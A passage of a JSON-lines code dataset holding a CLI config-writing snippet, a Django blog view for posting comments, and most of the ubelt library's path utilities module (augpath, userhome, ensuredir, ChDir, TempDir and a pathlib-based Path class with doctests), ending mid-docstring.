cfg_file:\n            cfg.write(cfg_file)\n        os.chmod(auth.CONFIG_FILE_PATH, 0o600)\n","repo_name":"tiktalik-cloud/tiktalik-cli","sub_path":"tiktalik_cli/command/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
+{"seq_id":"5591540905","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect\nfrom .models import Blog, PostImage, Comment, Tag\nfrom .forms import CommentForm\n\ndef all_blogs(request):\n    blogs = Blog.objects.order_by('-date')\n    return render(request, 'blog/all_blogs.html', {'blogs':blogs})\n\ndef detail(request, blog_id):\n    if request.method == 'POST':\n        cf = CommentForm(request.POST or None)\n        if cf.is_valid():\n            blog = get_object_or_404(Blog, pk=blog_id)\n            content = request.POST.get('content')\n            user = request.POST.get('user_name')\n            email = request.POST.get('email')\n            comment = Comment.objects.create(post=blog, user_name=user, email=email, content=content)\n            comment.save()\n            return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n        # An invalid form falls through to the common render below, so the\n        # bound form (and its errors) is shown on the detail page again.\n    else:\n        cf = CommentForm()\n    blog = get_object_or_404(Blog, pk=blog_id)\n    photos = PostImage.objects.filter(post=blog_id)\n    comment = Comment.objects.filter(post=blog_id)\n    tag = Tag.objects.filter(post=blog_id)\n    return render(request, 'updated/detail_blog.html', {'blog':blog, 'photos':photos, 'comments':comment, 'comment_form':cf, 'tag': tag})\n","repo_name":"shivam675/portfolio","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"24880675395","text":"\"\"\"\nPath and filesystem utilities.\n\nThe :class:`Path` object is an extension of :class:`pathlib.Path` that contains\nextra convenience methods corresponding to the extra functional methods in this\nmodule. (New in 0.11.0). See the class documentation for more details.\n\nThis module also defines functional path-related utilities, but moving forward\nusers should prefer using :class:`Path` over standalone functional methods. The\nfunctional versions will still be available for the foreseeable future, but their\nfunctionality is made redundant by :class:`Path`. 
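\n\nA quick composition sketch of the functional utilities summarized here\n(hedged illustration: it assumes only the public ubelt API named in this\nmodule, and the '~/data/project' path is a hypothetical example)::\n\n    import ubelt as ub\n    full = ub.expandpath('~/data/project')     # tilde/envvar expansion\n    variant = ub.augpath(full, prefix='tmp_')  # derive a sibling file name\n    print(ub.shrinkuser(variant))              # back to a '~'-style form\n    ub.ensuredir(ub.userhome())                # mkdir -p semantics (a no-op here)\n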
For completeness these\nfunctions are listed\n\nThe :func:`expandpath` function expands the tilde to $HOME and environment\nvariables to their values.\n\nThe :func:`augpath` function creates variants of an existing path without\nhaving to spend multiple lines of code splitting it up and stitching it back\ntogether.\n\nThe :func:`shrinkuser` function replaces your home directory with a tilde.\n\nThe :func:`userhome` function reports the home directory of the current user of\nthe operating system.\n\nThe :func:`ensuredir` function operates like ``mkdir -p`` in unix.\n\nNote:\n In the future the part of this module that defines Path may be renamed to\n util_pathlib.\n\"\"\"\nfrom os.path import (\n dirname, exists, expanduser, expandvars, join, normpath, split, splitext,\n)\nimport os\nimport sys\nfrom ubelt import util_io\nimport pathlib\nimport warnings\n\n\n__all__ = [\n 'Path', 'TempDir', 'augpath', 'shrinkuser', 'userhome', 'ensuredir',\n 'expandpath', 'ChDir',\n]\n\n\ndef augpath(path, suffix='', prefix='', ext=None, tail='', base=None,\n dpath=None, relative=None, multidot=False):\n \"\"\"\n Create a new path with a different extension, basename, directory, prefix,\n and/or suffix.\n\n A prefix is inserted before the basename. A suffix is inserted\n between the basename and the extension. The basename and extension can be\n replaced with a new one. Essentially a path is broken down into components\n (dpath, base, ext), and then recombined as (dpath, prefix, base, suffix,\n ext) after replacing any specified component.\n\n Args:\n path (str | PathLike): a path to augment\n\n suffix (str):\n placed between the basename and extension\n Note: this is referred to as stemsuffix in :func:`ub.Path.augment`.\n\n prefix (str):\n placed in front of the basename\n\n ext (str | None):\n if specified, replaces the extension\n\n tail (str | None):\n If specified, appends this text to the extension\n\n base (str | None):\n if specified, replaces the basename without extension.\n Note: this is referred to as stem in :func:`ub.Path.augment`.\n\n dpath (str | PathLike | None):\n if specified, replaces the specified \"relative\" directory, which by\n default is the parent directory.\n\n relative (str | PathLike | None):\n Replaces ``relative`` with ``dpath`` in ``path``.\n Has no effect if ``dpath`` is not specified.\n Defaults to the dirname of the input ``path``.\n *experimental* not currently implemented.\n\n multidot (bool): Allows extensions to contain multiple\n dots. Specifically, if False, everything after the last dot in the\n basename is the extension. 
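\n\n            (A standalone sketch of this split rule, illustration only:\n            :func:`os.path.splitext` gives the single-dot behavior and\n            ``str.split`` gives the multidot behavior)::\n\n                from os.path import splitext\n                def _split_ext(fname, multidot=False):\n                    if multidot:\n                        parts = fname.split('.', 1)\n                        return parts[0], ('' if len(parts) == 1 else '.' + parts[1])\n                    return splitext(fname)\n                assert _split_ext('foo.tar.gz', multidot=True) == ('foo', '.tar.gz')\n                assert _split_ext('foo.tar.gz', multidot=False) == ('foo.tar', '.gz')\n\n            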
If True, everything after the first dot\n in the basename is the extension.\n\n Returns:\n str: augmented path\n\n Example:\n >>> import ubelt as ub\n >>> path = 'foo.bar'\n >>> suffix = '_suff'\n >>> prefix = 'pref_'\n >>> ext = '.baz'\n >>> newpath = ub.augpath(path, suffix, prefix, ext=ext, base='bar')\n >>> print('newpath = %s' % (newpath,))\n newpath = pref_bar_suff.baz\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> augpath('foo.bar')\n 'foo.bar'\n >>> augpath('foo.bar', ext='.BAZ')\n 'foo.BAZ'\n >>> augpath('foo.bar', suffix='_')\n 'foo_.bar'\n >>> augpath('foo.bar', prefix='_')\n '_foo.bar'\n >>> augpath('foo.bar', base='baz')\n 'baz.bar'\n >>> augpath('foo.tar.gz', ext='.zip', multidot=True)\n foo.zip\n >>> augpath('foo.tar.gz', ext='.zip', multidot=False)\n foo.tar.zip\n >>> augpath('foo.tar.gz', suffix='_new', multidot=True)\n foo_new.tar.gz\n >>> augpath('foo.tar.gz', suffix='_new', tail='.cache', multidot=True)\n foo_new.tar.gz.cache\n \"\"\"\n stem = base # new nomenclature\n\n # Breakup path\n if relative is None:\n orig_dpath, fname = split(path)\n else: # nocover\n # if path.startswith(relative):\n # orig_dpath = relative\n # fname = relpath(path, relative)\n # else:\n # orig_dpath, fname = split(path)\n raise NotImplementedError('Not implemented yet')\n\n if multidot:\n # The first dot defines the extension\n parts = fname.split('.', 1)\n orig_base = parts[0]\n orig_ext = '' if len(parts) == 1 else '.' + parts[1]\n else:\n # The last dot defines the extension\n orig_base, orig_ext = splitext(fname)\n # Replace parts with specified augmentations\n if dpath is None:\n dpath = orig_dpath\n if ext is None:\n ext = orig_ext\n if stem is None:\n stem = orig_base\n # Recombine into new path\n new_fname = ''.join((prefix, stem, suffix, ext, tail))\n newpath = join(dpath, new_fname)\n return newpath\n\n\ndef userhome(username=None):\n \"\"\"\n Returns the path to some user's home directory.\n\n Args:\n username (str | None):\n name of a user on the system. 
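\n\n            (On POSIX, another user's home comes from the pwd database; a\n            hedged sketch of that branch only, since Windows instead derives\n            a sibling of the current user's home, as the implementation\n            below shows)::\n\n                import pwd  # POSIX-only module\n                def _posix_userhome(username):\n                    try:\n                        return pwd.getpwnam(username).pw_dir\n                    except KeyError:\n                        raise KeyError('Unknown user: {}'.format(username))\n\n            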
If unspecified, the current user is\n inferred from standard environment variables.\n\n Returns:\n str: path to the specified home directory\n\n Raises:\n KeyError: if the specified user does not exist on the system\n\n OSError: if username is unspecified and the current user cannot be\n inferred\n\n Example:\n >>> import ubelt as ub\n >>> import os\n >>> import getpass\n >>> username = getpass.getuser()\n >>> userhome_target = os.path.expanduser('~')\n >>> userhome_got1 = ub.userhome()\n >>> userhome_got2 = ub.userhome(username)\n >>> print(f'username={username}')\n >>> print(f'userhome_got1={userhome_got1}')\n >>> print(f'userhome_got2={userhome_got2}')\n >>> print(f'userhome_target={userhome_target}')\n >>> assert userhome_got1 == userhome_target\n >>> assert userhome_got2 == userhome_target\n \"\"\"\n if username is None:\n # get home directory for the current user\n if 'HOME' in os.environ:\n userhome_dpath = os.environ['HOME']\n else: # nocover\n if sys.platform.startswith('win32'):\n # win32 fallback when HOME is not defined\n if 'USERPROFILE' in os.environ:\n userhome_dpath = os.environ['USERPROFILE']\n elif 'HOMEPATH' in os.environ:\n drive = os.environ.get('HOMEDRIVE', '')\n userhome_dpath = join(drive, os.environ['HOMEPATH'])\n else:\n raise OSError(\"Cannot determine the user's home directory\")\n else:\n # posix fallback when HOME is not defined\n import pwd\n userhome_dpath = pwd.getpwuid(os.getuid()).pw_dir\n else:\n # A specific user directory was requested\n if sys.platform.startswith('win32'): # nocover\n # get the directory name for the current user\n c_users = dirname(userhome())\n userhome_dpath = join(c_users, username)\n if not exists(userhome_dpath):\n raise KeyError('Unknown user: {}'.format(username))\n else:\n import pwd\n try:\n pwent = pwd.getpwnam(username)\n except KeyError: # nocover\n raise KeyError('Unknown user: {}'.format(username))\n userhome_dpath = pwent.pw_dir\n return userhome_dpath\n\n\ndef shrinkuser(path, home='~'):\n \"\"\"\n Inverse of :func:`os.path.expanduser`.\n\n Args:\n path (str | PathLike): path in system file structure\n home (str): symbol used to replace the home path.\n Defaults to ``'~'``, but you might want to use ``'$HOME'`` or\n ``'%USERPROFILE%'`` instead.\n\n Returns:\n str: shortened path replacing the home directory with a symbol\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> path = expanduser('~')\n >>> assert path != '~'\n >>> assert shrinkuser(path) == '~'\n >>> assert shrinkuser(path + '1') == path + '1'\n >>> assert shrinkuser(path + '/1') == join('~', '1')\n >>> assert shrinkuser(path + '/1', '$HOME') == join('$HOME', '1')\n >>> assert shrinkuser('.') == '.'\n \"\"\"\n path = normpath(path)\n userhome_dpath = userhome()\n if path.startswith(userhome_dpath):\n if len(path) == len(userhome_dpath):\n path = home\n elif path[len(userhome_dpath)] == os.path.sep:\n path = home + path[len(userhome_dpath):]\n return path\n\n\ndef expandpath(path):\n \"\"\"\n Shell-like environment variable and tilde path expansion.\n\n Args:\n path (str | PathLike): string representation of a path\n\n Returns:\n str: expanded path\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> import ubelt as ub\n >>> assert normpath(ub.expandpath('~/foo')) == join(ub.userhome(), 'foo')\n >>> assert ub.expandpath('foo') == 'foo'\n \"\"\"\n path = expanduser(path)\n path = expandvars(path)\n return path\n\n\ndef ensuredir(dpath, mode=0o1777, verbose=0, recreate=False):\n r\"\"\"\n Ensures that directory will exist. 
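\n\n    Functionally this reduces to :func:`os.makedirs` with ``exist_ok=True``\n    plus the sticky-bit default mode; a minimal equivalent sketch::\n\n        import os\n        def _ensuredir(dpath, mode=0o1777):\n            if not os.path.exists(dpath):\n                os.makedirs(os.path.normpath(dpath), mode=mode, exist_ok=True)\n            return dpath\n\n    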
Creates new dir with sticky bits by\n default\n\n Args:\n dpath (str | PathLike | Tuple[str | PathLike]):\n directory to create if it does not exist.\n\n mode (int):\n octal permissions if a new directory is created.\n Defaults to 0o1777.\n\n verbose (int): verbosity\n\n recreate (bool): if True removes the directory and\n all of its contents and creates a new empty directory.\n DEPRECATED: Use ``ub.Path(dpath).delete().ensuredir()`` instead.\n\n Returns:\n str: the ensured directory\n\n SeeAlso:\n :func:`ubelt.Path.ensuredir`\n\n Example:\n >>> import ubelt as ub\n >>> dpath = ub.Path.appdir('ubelt', 'ensuredir')\n >>> dpath.delete()\n >>> assert not dpath.exists()\n >>> ub.ensuredir(dpath)\n >>> assert dpath.exists()\n >>> dpath.delete()\n \"\"\"\n if isinstance(dpath, (list, tuple)):\n dpath = join(*dpath)\n\n if recreate:\n import ubelt as ub\n ub.schedule_deprecation(\n modname='ubelt',\n migration='Use ``ub.Path(dpath).delete().ensuredir()`` instead', name='recreate',\n type='argument of ensuredir', deprecate='1.3.0', error='2.0.0',\n remove='2.1.0',\n )\n util_io.delete(dpath, verbose=verbose)\n\n if not exists(dpath):\n if verbose:\n print('Ensuring directory (creating {!r})'.format(dpath))\n os.makedirs(normpath(dpath), mode=mode, exist_ok=True)\n else:\n if verbose:\n print('Ensuring directory (existing {!r})'.format(dpath))\n return dpath\n\n\nclass ChDir:\n \"\"\"\n Context manager that changes the current working directory and then\n returns you to where you were.\n\n This is nearly the same as the stdlib :func:`contextlib.chdir`, with the\n exception that it will do nothing if the input path is None (i.e. the user\n did not want to change directories).\n\n Args:\n dpath (str | PathLike | None):\n The new directory to work in.\n If None, then the context manager is disabled.\n\n SeeAlso:\n :func:`contextlib.chdir`\n\n Example:\n >>> import ubelt as ub\n >>> dpath = ub.Path.appdir('ubelt/tests/chdir').ensuredir()\n >>> dir1 = (dpath / 'dir1').ensuredir()\n >>> dir2 = (dpath / 'dir2').ensuredir()\n >>> with ChDir(dpath):\n >>> assert ub.Path.cwd() == dpath\n >>> # change to the given directory, and then returns back\n >>> with ChDir(dir1):\n >>> assert ub.Path.cwd() == dir1\n >>> with ChDir(dir2):\n >>> assert ub.Path.cwd() == dir2\n >>> # changes inside the context manager will be reset\n >>> os.chdir(dpath)\n >>> assert ub.Path.cwd() == dir1\n >>> assert ub.Path.cwd() == dpath\n >>> with ChDir(dir1):\n >>> assert ub.Path.cwd() == dir1\n >>> with ChDir(None):\n >>> assert ub.Path.cwd() == dir1\n >>> # When disabled, the cwd does *not* reset at context exit\n >>> os.chdir(dir2)\n >>> assert ub.Path.cwd() == dir2\n >>> os.chdir(dir1)\n >>> # Dont change dirs, but reset to your cwd at context end\n >>> with ChDir('.'):\n >>> os.chdir(dir2)\n >>> assert ub.Path.cwd() == dir1\n >>> assert ub.Path.cwd() == dpath\n \"\"\"\n def __init__(self, dpath):\n self._context_dpath = dpath\n self._orig_dpath = None\n\n def __enter__(self):\n \"\"\"\n Returns:\n ChDir: self\n \"\"\"\n if self._context_dpath is not None:\n self._orig_dpath = os.getcwd()\n os.chdir(self._context_dpath)\n return self\n\n def __exit__(self, ex_type, ex_value, ex_traceback):\n \"\"\"\n Args:\n ex_type (Type[BaseException] | None):\n ex_value (BaseException | None):\n ex_traceback (TracebackType | None):\n\n Returns:\n bool | None\n \"\"\"\n if self._context_dpath is not None:\n os.chdir(self._orig_dpath)\n\n\nclass TempDir:\n \"\"\"\n Context for creating and cleaning up temporary directories.\n\n DEPRECATED. 
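\n\n    The stdlib replacement named just below offers the same\n    create-then-cleanup contract as a context manager (hedged sketch of\n    the migration)::\n\n        import os.path\n        import tempfile\n        with tempfile.TemporaryDirectory() as dpath:\n            assert os.path.exists(dpath)\n        assert not os.path.exists(dpath)\n\n    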
Use :mod:`tempfile` instead.\n\n Note:\n This exists because :class:`tempfile.TemporaryDirectory` was\n introduced in Python 3.2. Thus once ubelt no longer supports\n python 2.7, this class will be deprecated.\n\n Attributes:\n dpath (str | None)\n\n Note:\n # WE MAY WANT TO KEEP THIS FOR WINDOWS.\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> with TempDir() as self:\n >>> dpath = self.dpath\n >>> assert exists(dpath)\n >>> assert not exists(dpath)\n\n Example:\n >>> from ubelt.util_path import * # NOQA\n >>> self = TempDir()\n >>> dpath = self.ensure()\n >>> assert exists(dpath)\n >>> self.cleanup()\n >>> assert not exists(dpath)\n \"\"\"\n def __init__(self):\n import ubelt as ub\n ub.schedule_deprecation(\n modname='ubelt',\n migration='Use tempfile instead', name='TempDir',\n type='class', deprecate='1.2.0', error='1.4.0',\n remove='1.5.0',\n )\n self.dpath = None\n\n def __del__(self):\n self.cleanup()\n\n def ensure(self):\n import tempfile\n if not self.dpath:\n self.dpath = tempfile.mkdtemp()\n return self.dpath\n\n def cleanup(self):\n if self.dpath:\n import shutil\n shutil.rmtree(self.dpath)\n self.dpath = None\n\n def start(self):\n self.ensure()\n return self\n\n def __enter__(self):\n return self.start()\n\n def __exit__(self, ex_type, ex_value, ex_traceback):\n \"\"\"\n Args:\n ex_type (Type[BaseException] | None):\n ex_value (BaseException | None):\n ex_traceback (TracebackType | None):\n\n Returns:\n bool | None\n \"\"\"\n self.cleanup()\n\n\n_PathBase = pathlib.WindowsPath if os.name == 'nt' else pathlib.PosixPath\n\n\nclass Path(_PathBase):\n \"\"\"\n This class extends :class:`pathlib.Path` with extra functionality and\n convenience methods.\n\n New methods are designed to support chaining.\n\n In addition to new methods this class supports the addition (``+``)\n operator via which allows for better drop-in compatibility with code using\n existing string-based paths.\n\n Note:\n On windows this inherits from :class:`pathlib.WindowsPath`.\n\n New methods are\n\n * :py:meth:`ubelt.Path.ensuredir` - Like mkdir but with easier defaults.\n\n * :py:meth:`ubelt.Path.delete` - Previously pathlib could only remove one file at a time.\n\n * :py:meth:`ubelt.Path.copy` - Pathlib has no similar functionality.\n\n * :py:meth:`ubelt.Path.move` - Pathlib has no similar functionality.\n\n * :py:meth:`ubelt.Path.augment` - Unifies and extends disparate functionality across pathlib.\n\n * :py:meth:`ubelt.Path.expand` - Unifies existing environ and home expansion.\n\n * :py:meth:`ubelt.Path.ls` - Like iterdir, but more interactive.\n\n * :py:meth:`ubelt.Path.shrinkuser` - Python has no similar functionality.\n\n * :py:meth:`ubelt.Path.walk` - Pathlib had no similar functionality.\n\n New classmethods are\n\n * :py:meth:`ubelt.Path.appdir` - application directories\n\n Modified methods are\n\n * :py:meth:`ubelt.Path.touch` - returns self to support chaining\n\n Example:\n >>> # Ubelt extends pathlib functionality\n >>> import ubelt as ub\n >>> # Chain expansion and mkdir with cumbersome args.\n >>> dpath = ub.Path('~/.cache/ubelt/demo_path').expand().ensuredir()\n >>> fpath = dpath / 'text_file.txt'\n >>> # Augment is concise and chainable\n >>> aug_fpath = fpath.augment(stemsuffix='.aux', ext='.jpg').touch()\n >>> aug_dpath = dpath.augment(stemsuffix='demo_path2')\n >>> assert aug_fpath.read_text() == ''\n >>> fpath.write_text('text data')\n >>> assert aug_fpath.exists()\n >>> # Delete is akin to \"rm -rf\" and is also chainable.\n >>> assert not 
aug_fpath.delete().exists()\n >>> assert dpath.exists()\n >>> assert not dpath.delete().exists()\n >>> print(f'{str(fpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n >>> print(f'{str(dpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n >>> print(f'{str(aug_fpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n >>> print(f'{str(aug_dpath.shrinkuser()).replace(os.path.sep, \"/\")}')\n ~/.cache/ubelt/demo_path/text_file.txt\n ~/.cache/ubelt/demo_path\n ~/.cache/ubelt/demo_path/text_file.aux.jpg\n ~/.cache/ubelt/demo_pathdemo_path2\n\n Inherited unmodified properties from :class:`pathlib.Path` are:\n\n * :py:data:`pathlib.PurePath.anchor`\n * :py:data:`pathlib.PurePath.name`\n * :py:data:`pathlib.PurePath.parts`\n * :py:data:`pathlib.PurePath.parent`\n * :py:data:`pathlib.PurePath.parents`\n * :py:data:`pathlib.PurePath.suffix`\n * :py:data:`pathlib.PurePath.suffixes`\n * :py:data:`pathlib.PurePath.stem`\n * :py:data:`pathlib.PurePath.drive`\n * :py:data:`pathlib.PurePath.root`\n\n Inherited unmodified classmethods from :class:`pathlib.Path` are:\n\n * :py:meth:`pathlib.Path.cwd`\n * :py:meth:`pathlib.Path.home`\n\n Inherited unmodified methods from :class:`pathlib.Path` are:\n\n * :py:meth:`pathlib.Path.samefile`\n * :py:meth:`pathlib.Path.iterdir`\n\n * :py:meth:`pathlib.Path.glob`\n * :py:meth:`pathlib.Path.rglob`\n\n * :py:meth:`pathlib.Path.resolve`\n\n * :py:meth:`pathlib.Path.lstat`\n * :py:meth:`pathlib.Path.stat`\n * :py:meth:`pathlib.Path.owner`\n * :py:meth:`pathlib.Path.group`\n\n * :py:meth:`pathlib.Path.open`\n * :py:meth:`pathlib.Path.read_bytes`\n * :py:meth:`pathlib.Path.read_text`\n * :py:meth:`pathlib.Path.write_bytes`\n * :py:meth:`pathlib.Path.write_text`\n * :py:meth:`pathlib.Path.readlink`\n\n * :py:meth:`pathlib.Path.mkdir` - we recommend :py:meth:`ubelt.Path.ensuredir` instead.\n\n * :py:meth:`pathlib.Path.chmod`\n * :py:meth:`pathlib.Path.lchmod`\n\n * :py:meth:`pathlib.Path.unlink`\n * :py:meth:`pathlib.Path.rmdir`\n\n * :py:meth:`pathlib.Path.rename`\n * :py:meth:`pathlib.Path.replace`\n\n * :py:meth:`pathlib.Path.symlink_to`\n * :py:meth:`pathlib.Path.hardlink_to`\n * :py:meth:`pathlib.Path.link_to` - deprecated\n\n * :py:meth:`pathlib.Path.exists`\n * :py:meth:`pathlib.Path.is_dir`\n * :py:meth:`pathlib.Path.is_file`\n * :py:meth:`pathlib.Path.is_mount`\n * :py:meth:`pathlib.Path.is_symlink`\n * :py:meth:`pathlib.Path.is_block_device`\n * :py:meth:`pathlib.Path.is_char_device`\n * :py:meth:`pathlib.Path.is_fifo`\n * :py:meth:`pathlib.Path.is_socket`\n\n * :py:meth:`pathlib.Path.expanduser` - we recommend :py:meth:`ubelt.Path.expand` instead.\n\n * :py:meth:`pathlib.PurePath.as_posix`\n * :py:meth:`pathlib.PurePath.as_uri`\n\n * :py:meth:`pathlib.PurePath.with_name` - we recommend :py:meth:`ubelt.Path.augment` instead.\n * :py:meth:`pathlib.PurePath.with_stem` - we recommend :py:meth:`ubelt.Path.augment` instead.\n * :py:meth:`pathlib.PurePath.with_suffix` - we recommend :py:meth:`ubelt.Path.augment` instead.\n\n * :py:meth:`pathlib.PurePath.relative_to`\n\n * :py:meth:`pathlib.PurePath.joinpath`\n\n * :py:meth:`pathlib.PurePath.is_relative_to`\n * :py:meth:`pathlib.PurePath.is_absolute`\n * :py:meth:`pathlib.PurePath.is_reserved`\n\n * :py:meth:`pathlib.PurePath.match`\n \"\"\"\n __slots__ = ()\n\n @classmethod\n def appdir(cls, appname=None, *args, type='cache'):\n \"\"\"\n Returns a standard platform specific directory for an application to\n use as cache, config, or data.\n\n The default root location depends on the platform and is specified the\n the 
following table:\n\n TextArt:\n\n | POSIX | Windows | MacOSX\n data | $XDG_DATA_HOME | %APPDATA% | ~/Library/Application Support\n config | $XDG_CONFIG_HOME | %APPDATA% | ~/Library/Application Support\n cache | $XDG_CACHE_HOME | %LOCALAPPDATA% | ~/Library/Caches\n\n\n If an environment variable is not specified the defaults are:\n APPDATA = ~/AppData/Roaming\n LOCALAPPDATA = ~/AppData/Local\n\n XDG_DATA_HOME = ~/.local/share\n XDG_CACHE_HOME = ~/.cache\n XDG_CONFIG_HOME = ~/.config\n\n Args:\n appname (str | None):\n The name of the application.\n\n *args : optional subdirs\n\n type (str):\n the type of data the expected to be stored in this application\n directory. Valid options are 'cache', 'config', or 'data'.\n\n Returns:\n Path: a new path object for the specified application directory.\n\n SeeAlso:\n This provides functionality similar to the\n `appdirs `_ -\n and\n `platformdirs `_ -\n packages.\n\n Example:\n >>> # xdoctest: +IGNORE_WANT\n >>> import ubelt as ub\n >>> print(ub.Path.appdir('ubelt', type='cache').shrinkuser())\n >>> print(ub.Path.appdir('ubelt', type='config').shrinkuser())\n >>> print(ub.Path.appdir('ubelt', type='data').shrinkuser())\n ~/.cache/ubelt\n ~/.config/ubelt\n ~/.local/share/ubelt\n >>> import pytest\n >>> with pytest.raises(KeyError):\n >>> ub.Path.appdir('ubelt', type='other')\n\n Example:\n >>> # xdoctest: +IGNORE_WANT\n >>> import ubelt as ub\n >>> # Can now call appdir without any arguments\n >>> print(ub.Path.appdir().shrinkuser())\n ~/.cache\n \"\"\"\n from ubelt import util_platform\n if type == 'cache':\n base = util_platform.platform_cache_dir()\n elif type == 'config':\n base = util_platform.platform_config_dir()\n elif type == 'data':\n base = util_platform.platform_data_dir()\n else:\n raise KeyError(type)\n\n if appname is None:\n return cls(base, *args)\n else:\n return cls(base, appname, *args)\n\n def augment(self, prefix='', stemsuffix='', ext=None, stem=None, dpath=None,\n tail='', relative=None, multidot=False, suffix=''):\n \"\"\"\n Create a new path with a different extension, basename, directory,\n prefix, and/or suffix.\n\n See :func:`augpath` for more details.\n\n Args:\n prefix (str):\n Text placed in front of the stem. Defaults to ''.\n\n stemsuffix (str):\n Text placed between the stem and extension. Defaults to ''.\n\n ext (str | None):\n If specified, replaces the extension\n\n stem (str | None):\n If specified, replaces the stem (i.e. basename without\n extension).\n\n dpath (str | PathLike | None):\n If specified, replaces the specified \"relative\" directory,\n which by default is the parent directory.\n\n tail (str | None):\n If specified, appends this text the very end of the path -\n after the extension.\n\n relative (str | PathLike | None):\n Replaces ``relative`` with ``dpath`` in ``path``.\n Has no effect if ``dpath`` is not specified.\n Defaults to the dirname of the input ``path``.\n *experimental* not currently implemented.\n\n multidot (bool): Allows extensions to contain\n multiple dots. Specifically, if False, everything after the\n last dot in the basename is the extension. If True, everything\n after the first dot in the basename is the extension.\n\n SeeAlso:\n :py:meth:`pathlib.Path.with_stem`\n :py:meth:`pathlib.Path.with_name`\n :py:meth:`pathlib.Path.with_suffix`\n\n Returns:\n Path: augmented path\n\n Note:\n NOTICE OF BACKWARDS INCOMPATABILITY.\n\n THE INITIAL RELEASE OF Path.augment suffered from an unfortunate\n variable naming decision that conflicts with pathlib.Path\n\n .. 
code:: python\n\n p = ub.Path('the.entire.fname.or.dname.is.the.name.exe')\n print(f'p ={p}')\n print(f'p.name={p.name}')\n p = ub.Path('the.stem.ends.here.ext')\n print(f'p ={p}')\n print(f'p.stem={p.stem}')\n p = ub.Path('only.the.last.dot.is.the.suffix')\n print(f'p ={p}')\n print(f'p.suffix={p.suffix}')\n p = ub.Path('but.all.suffixes.can.be.recovered')\n print(f'p ={p}')\n print(f'p.suffixes={p.suffixes}')\n\n Example:\n >>> import ubelt as ub\n >>> path = ub.Path('foo.bar')\n >>> suffix = '_suff'\n >>> prefix = 'pref_'\n >>> ext = '.baz'\n >>> newpath = path.augment(prefix=prefix, stemsuffix=suffix, ext=ext, stem='bar')\n >>> print('newpath = {!r}'.format(newpath))\n newpath = Path('pref_bar_suff.baz')\n\n Example:\n >>> import ubelt as ub\n >>> path = ub.Path('foo.bar')\n >>> stemsuffix = '_suff'\n >>> prefix = 'pref_'\n >>> ext = '.baz'\n >>> newpath = path.augment(prefix=prefix, stemsuffix=stemsuffix, ext=ext, stem='bar')\n >>> print('newpath = {!r}'.format(newpath))\n\n Example:\n >>> # Compare our augpath(ext=...) versus pathlib with_suffix(...)\n >>> import ubelt as ub\n >>> cases = [\n >>> ub.Path('no_ext'),\n >>> ub.Path('one.ext'),\n >>> ub.Path('double..dot'),\n >>> ub.Path('two.many.cooks'),\n >>> ub.Path('path.with.three.dots'),\n >>> ub.Path('traildot.'),\n >>> ub.Path('doubletraildot..'),\n >>> ub.Path('.prefdot'),\n >>> ub.Path('..doubleprefdot'),\n >>> ]\n >>> for path in cases:\n >>> print('--')\n >>> print('path = {}'.format(ub.repr2(path, nl=1)))\n >>> ext = '.EXT'\n >>> method_pathlib = path.with_suffix(ext)\n >>> method_augment = path.augment(ext=ext)\n >>> if method_pathlib == method_augment:\n >>> print(ub.color_text('sagree', 'green'))\n >>> else:\n >>> print(ub.color_text('disagree', 'red'))\n >>> print('path.with_suffix({}) = {}'.format(ext, ub.repr2(method_pathlib, nl=1)))\n >>> print('path.augment(ext={}) = {}'.format(ext, ub.repr2(method_augment, nl=1)))\n >>> print('--')\n \"\"\"\n if suffix: # nocover\n from ubelt.util_deprecate import schedule_deprecation\n schedule_deprecation(\n 'ubelt', 'suffix', 'arg',\n deprecate='1.1.3', remove='1.4.0',\n migration='Use stemsuffix instead',\n )\n if not stemsuffix:\n stemsuffix = suffix\n warnings.warn(\n 'DEVELOPER NOTICE: The ubelt.Path.augment function may '\n 'experience a BACKWARDS INCOMPATIBLE update in the future '\n 'having to do with the suffix argument to ub.Path.augment '\n 'To avoid any issue use the ``stemsuffix` argument or use the '\n '``ubelt.augpath`` function instead. '\n 'If you see this warning, please make an '\n 'issue on https://github.com/Erotemic/ubelt/issues indicating '\n 'that there are users of this function in the wild. 
If there '\n 'are none, then this signature will be \"fixed\", but if anyone '\n 'depends on this feature then we will continue to support it as '\n 'is.'\n )\n\n aug = augpath(self, suffix=stemsuffix, prefix=prefix, ext=ext, base=stem,\n dpath=dpath, relative=relative, multidot=multidot,\n tail=tail)\n new = self.__class__(aug)\n return new\n\n def delete(self):\n \"\"\"\n Removes a file or recursively removes a directory.\n If a path does not exist, then this is does nothing.\n\n SeeAlso:\n :func:`ubelt.delete`\n\n Returns:\n Path: reference to self\n\n Example:\n >>> import ubelt as ub\n >>> from os.path import join\n >>> base = ub.Path.appdir('ubelt', 'delete_test2')\n >>> dpath1 = (base / 'dir').ensuredir()\n >>> (base / 'dir' / 'subdir').ensuredir()\n >>> (base / 'dir' / 'to_remove1.txt').touch()\n >>> fpath1 = (base / 'dir' / 'subdir' / 'to_remove3.txt').touch()\n >>> fpath2 = (base / 'dir' / 'subdir' / 'to_remove2.txt').touch()\n >>> assert all(p.exists() for p in [dpath1, fpath1, fpath2])\n >>> fpath1.delete()\n >>> assert all(p.exists() for p in [dpath1, fpath2])\n >>> assert not fpath1.exists()\n >>> dpath1.delete()\n >>> assert not any(p.exists() for p in [dpath1, fpath1, fpath2])\n \"\"\"\n util_io.delete(self)\n return self\n\n def ensuredir(self, mode=0o777):\n \"\"\"\n Concise alias of ``self.mkdir(parents=True, exist_ok=True)``\n\n Args:\n mode (int):\n octal permissions if a new directory is created.\n Defaults to 0o777.\n\n Returns:\n Path: returns itself\n\n Example:\n >>> import ubelt as ub\n >>> cache_dpath = ub.Path.appdir('ubelt').ensuredir()\n >>> dpath = ub.Path(cache_dpath, 'newdir')\n >>> dpath.delete()\n 